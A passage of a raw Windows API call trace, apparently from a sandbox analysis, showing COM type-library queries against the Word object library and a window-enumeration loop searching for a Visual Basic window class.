ppvObject=0x125ee0 | out: ppvObject=0x125ee0*=0x0) returned 0x80004002 [0023.487] IUnknown:AddRef (This=0x569efdc) returned 0x6 [0023.487] ITypeInfo:RemoteGetTypeAttr (in: This=0x569efdc, ppTypeAttr=0x125ef0, pDummy=0x54bf870 | out: ppTypeAttr=0x125ef0, pDummy=0x54bf870*=0x786de74) returned 0x0 [0023.487] ITypeInfo:LocalReleaseTypeAttr (This=0x569efdc) returned 0x28187a8 [0023.487] IUnknown:Release (This=0x569efdc) returned 0x5 [0023.487] IUnknown:Release (This=0x569efdc) returned 0x4 [0023.487] CRetailMalloc_Alloc () returned 0x57f3c08 [0023.487] CRetailMalloc_Alloc () returned 0x573cdf0 [0023.488] ITypeInfo:RemoteGetTypeAttr (in: This=0x569f008, ppTypeAttr=0x125ed4, pDummy=0x7 | out: ppTypeAttr=0x125ed4, pDummy=0x7) returned 0x0 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x0, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x573e970 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x1, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x573e970 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x2, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x573e970 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x3, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x4, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x5, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x6, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x7, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x8, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x9, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0xa, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0xb, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0xc, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x57f3968 [0023.488] ITypeInfo:LocalReleaseTypeAttr (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetTypeAttr (in: This=0x569f008, ppTypeAttr=0x125ed4, pDummy=0x0 | out: ppTypeAttr=0x125ed4, pDummy=0x0) returned 0x0 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x0, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x573e970 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x1, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x573e970 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x2, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x573e970 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x3, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x4, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x5, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x6, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x7, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x8, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0x9, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0xa, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0xb, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:RemoteGetFuncDesc (in: This=0x569f008, index=0xc, ppFuncDesc=0x125ed0, pDummy=0x573cdf8 | out: ppFuncDesc=0x125ed0, pDummy=0x573cdf8*=0x0) returned 0x0 [0023.488] ITypeInfo:LocalReleaseFuncDesc (This=0x569f008) returned 0x28187a8 [0023.488] ITypeInfo:LocalReleaseTypeAttr (This=0x569f008) returned 0x57f3968 [0023.489] IUnknown:Release (This=0x569f008) returned 0x3 [0023.489] CRetailMalloc_Alloc () returned 0x78b1f20 [0023.489] CRetailMalloc_Alloc () returned 0x78b1f30 [0023.489] CRetailMalloc_Alloc () returned 0x78b1f40 [0023.489] IUnknown:QueryInterface (in: This=0x569f008, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125c14 | out: ppvObject=0x125c14*=0x0) returned 0x80004002 [0023.489] ITypeInfo:RemoteGetTypeAttr (in: This=0x569f008, ppTypeAttr=0x125c10, pDummy=0x0 | out: ppTypeAttr=0x125c10, pDummy=0x0) returned 0x0 [0023.489] IUnknown:QueryInterface (in: This=0x569f008, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125bd8 | out: ppvObject=0x125bd8*=0x0) returned 0x80004002 [0023.489] IUnknown:AddRef (This=0x569f008) returned 0x4 [0023.489] ITypeInfo:RemoteGetTypeAttr (in: This=0x569f008, ppTypeAttr=0x125bc8, pDummy=0x125ec0 | out: ppTypeAttr=0x125bc8, pDummy=0x125ec0*=0x721315b9) returned 0x0 [0023.489] ITypeInfo:LocalReleaseTypeAttr (This=0x569f008) returned 0x57f3968 [0023.489] IUnknown:Release (This=0x569f008) returned 0x3 [0023.489] CRetailMalloc_Alloc () returned 0x57963e0 [0023.489] ITypeInfo:RemoteGetTypeAttr (in: This=0x569f008, ppTypeAttr=0x125bc8, pDummy=0x125bf8 | out: ppTypeAttr=0x125bc8, pDummy=0x125bf8*=0x1) returned 0x0 [0023.489] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x569f008, ppTLib=0x125bc4, pIndex=0x125bd0 | out: ppTLib=0x125bc4*=0x2875630, pIndex=0x125bd0*=0x20e) returned 0x0 [0023.489] ITypeLib:RemoteGetLibAttr (in: This=0x2875630, ppTLibAttr=0x1259c4, pDummy=0x5799bd8 | out: ppTLibAttr=0x1259c4, pDummy=0x5799bd8*=0x2876dfc) returned 0x0 [0023.489] ITypeLib:RemoteGetDocumentation (in: This=0x2875630, index=-1, refPtrFlags=0x1259c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x5799bd8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x5799bd8*="Ḡ*逸އ瀤ʇ￿￿") returned 0x0 [0023.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB#Microsoft Word 15.0 Object Library", cchWideChar=53, lpMultiByteStr=0x125a10, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office15\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 53 [0023.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x125b18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0023.489] ITypeLib:LocalReleaseTLibAttr (This=0x2875630) returned 0x55d8dc8 [0023.489] CRetailMalloc_Alloc () returned 0x786eb50 [0023.489] IUnknown:AddRef (This=0x569f008) returned 0x4 [0023.489] ITypeInfo:LocalReleaseTypeAttr (This=0x569f008) returned 0x57f3968 [0023.489] ITypeInfo:LocalReleaseTypeAttr (This=0x569f008) returned 0x28187a8 [0023.489] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.489] CRetailMalloc_Alloc () returned 0x786bdb8 [0023.489] IUnknown:Release (This=0x569ef84) returned 0x2 [0025.684] DefWindowProcA (hWnd=0x201d4, Msg=0xc07c, wParam=0x50, lParam=0x0) returned 0x0 [0025.694] DefWindowProcA (hWnd=0x201d4, Msg=0xc07c, wParam=0x50, lParam=0x0) returned 0x0 [0025.698] SendMessageA (hWnd=0x500fc, Msg=0x84, wParam=0x0, lParam=0x27301a5) returned 0x1 [0025.698] SendMessageA (hWnd=0x500fc, Msg=0x20, wParam=0x500fc, lParam=0x2000001) returned 0x0 [0087.798] DefWindowProcA (hWnd=0x201d4, Msg=0x1c, wParam=0x0, lParam=0x61c) returned 0x0 [0089.241] DefWindowProcA (hWnd=0x201d4, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0089.243] DefWindowProcA (hWnd=0x201d4, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0089.279] GetCurrentThreadId () returned 0x9c8 [0089.279] GetWindowLongA (hWnd=0x0, nIndex=-16) returned 0 [0089.279] GetDesktopWindow () returned 0x10010 [0089.279] GetWindow (hWnd=0x10010, uCmd=0x5) returned 0x1005e [0089.279] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.279] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.279] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.279] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0089.279] GetClassNameA (in: hWnd=0x1005c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.279] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.279] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.279] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0089.279] GetClassNameA (in: hWnd=0x10048, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.279] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.279] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.279] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0089.279] GetClassNameA (in: hWnd=0x10072, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.279] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.279] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.279] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0089.279] GetClassNameA (in: hWnd=0x10066, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.279] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.279] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0089.280] GetClassNameA (in: hWnd=0x10064, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.280] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0089.280] GetClassNameA (in: hWnd=0x10060, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.280] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x10040 [0089.280] GetClassNameA (in: hWnd=0x10040, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Button") returned 6 [0089.280] lstrcmpA (lpString1="Button", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003e [0089.280] GetClassNameA (in: hWnd=0x1003e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0089.280] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0089.280] GetClassNameA (in: hWnd=0x1003a, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.280] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x1003c [0089.280] GetClassNameA (in: hWnd=0x1003c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Shell_TrayWnd") returned 13 [0089.280] lstrcmpA (lpString1="Shell_TrayWnd", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x10118 [0089.280] GetClassNameA (in: hWnd=0x10118, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ATL:72DF8158") returned 12 [0089.280] lstrcmpA (lpString1="ATL:72DF8158", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x630 [0089.280] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0089.280] GetClassNameA (in: hWnd=0x10112, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.280] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4f8 [0089.280] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0089.280] GetClassNameA (in: hWnd=0x10110, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TaskSwitcherWnd") returned 15 [0089.280] lstrcmpA (lpString1="TaskSwitcherWnd", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x4f8 [0089.280] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0089.280] GetClassNameA (in: hWnd=0x200aa, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.280] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x200aa, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0089.280] GetClassNameA (in: hWnd=0x200c6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.280] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0089.280] GetClassNameA (in: hWnd=0x200d6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.280] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0089.280] GetClassNameA (in: hWnd=0x200c4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="Desktop User Picture") returned 20 [0089.280] lstrcmpA (lpString1="Desktop User Picture", lpString2="ThunderRT6Main") returned -1 [0089.280] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.280] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x100d2 [0089.280] GetClassNameA (in: hWnd=0x100d2, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.281] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.281] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0089.281] GetClassNameA (in: hWnd=0x5007c, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="tooltips_class32") returned 16 [0089.281] lstrcmpA (lpString1="tooltips_class32", lpString2="ThunderRT6Main") returned 1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x5007c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.281] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0089.281] GetClassNameA (in: hWnd=0x10074, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0089.281] lstrcmpA (lpString1="TaskListThumbnailWnd", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x64c [0089.281] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x301ee [0089.281] GetClassNameA (in: hWnd=0x301ee, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="NUIDialog") returned 9 [0089.281] lstrcmpA (lpString1="NUIDialog", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x301ee, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.281] GetWindowLongA (hWnd=0x301ee, nIndex=-16) returned -2067267584 [0089.281] GetWindowLongA (hWnd=0x301ee, nIndex=-6) returned 1759510528 [0089.281] GetWindowLongA (hWnd=0x301ee, nIndex=-6) returned 1759510528 [0089.281] GetWindow (hWnd=0x301ee, uCmd=0x2) returned 0x101e4 [0089.281] GetClassNameA (in: hWnd=0x101e4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0089.281] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.281] GetWindowLongA (hWnd=0x101e4, nIndex=-16) returned -1946157056 [0089.281] GetWindowLongA (hWnd=0x101e4, nIndex=-6) returned 0 [0089.281] GetWindowLongA (hWnd=0x101e4, nIndex=-6) returned 0 [0089.281] GetWindow (hWnd=0x101e4, uCmd=0x2) returned 0x201a4 [0089.281] GetClassNameA (in: hWnd=0x201a4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.281] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x201a4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.281] GetWindowLongA (hWnd=0x201a4, nIndex=-16) returned -1946157056 [0089.281] GetWindowLongA (hWnd=0x201a4, nIndex=-6) returned 12648448 [0089.281] GetWindowLongA (hWnd=0x201a4, nIndex=-6) returned 12648448 [0089.281] GetWindow (hWnd=0x201a4, uCmd=0x2) returned 0x101b8 [0089.281] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0089.281] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.281] GetWindowLongA (hWnd=0x101b8, nIndex=-16) returned 919535616 [0089.281] GetWindowLongA (hWnd=0x101b8, nIndex=-6) returned 1785659392 [0089.281] GetWindowLongA (hWnd=0x101b8, nIndex=-6) returned 1785659392 [0089.281] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x100e6 [0089.281] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="MSCTFIME UI") returned 11 [0089.281] lstrcmpA (lpString1="MSCTFIME UI", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.281] GetWindow (hWnd=0x100e6, uCmd=0x2) returned 0x1002e [0089.281] GetClassNameA (in: hWnd=0x1002e, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="IME") returned 3 [0089.281] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x1002e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x61c [0089.281] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x101f6 [0089.281] GetClassNameA (in: hWnd=0x101f6, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OpusApp") returned 7 [0089.281] lstrcmpA (lpString1="OpusApp", lpString2="ThunderRT6Main") returned -1 [0089.281] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.281] GetWindowLongA (hWnd=0x101f6, nIndex=-16) returned 131006464 [0089.281] GetWindowLongA (hWnd=0x101f6, nIndex=-6) returned 1785659392 [0089.281] GetWindowLongA (hWnd=0x101f6, nIndex=-6) returned 1785659392 [0089.281] GetWindow (hWnd=0x101f6, uCmd=0x2) returned 0x201d4 [0089.281] GetClassNameA (in: hWnd=0x201d4, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="ThunderMain") returned 11 [0089.282] lstrcmpA (lpString1="ThunderMain", lpString2="ThunderRT6Main") returned -1 [0089.282] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c8 [0089.282] GetWindowLongA (hWnd=0x201d4, nIndex=-16) returned -2080374784 [0089.282] GetWindowLongA (hWnd=0x201d4, nIndex=-6) returned 1913454592 [0089.282] IsWindowEnabled (hWnd=0x201d4) returned 1 [0089.282] GetPropA (hWnd=0x201d4, lpString=0xc13c) returned 0x0 [0089.282] SetPropA (hWnd=0x201d4, lpString=0xc13c, hData=0x1) returned 1 [0089.282] EnableWindow (hWnd=0x201d4, bEnable=0) returned 0 [0089.282] DefWindowProcA (hWnd=0x201d4, Msg=0x1f, wParam=0x0, lParam=0x0) returned 0x0 [0089.282] DefWindowProcA (hWnd=0x201d4, Msg=0xa, wParam=0x0, lParam=0x0) returned 0x0 [0089.282] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x30106 [0089.282] GetClassNameA (in: hWnd=0x30106, lpClassName=0x12633c, nMaxCount=64 | out: lpClassName="OleDdeWndClass") returned 14 [0089.282] lstrcmpA 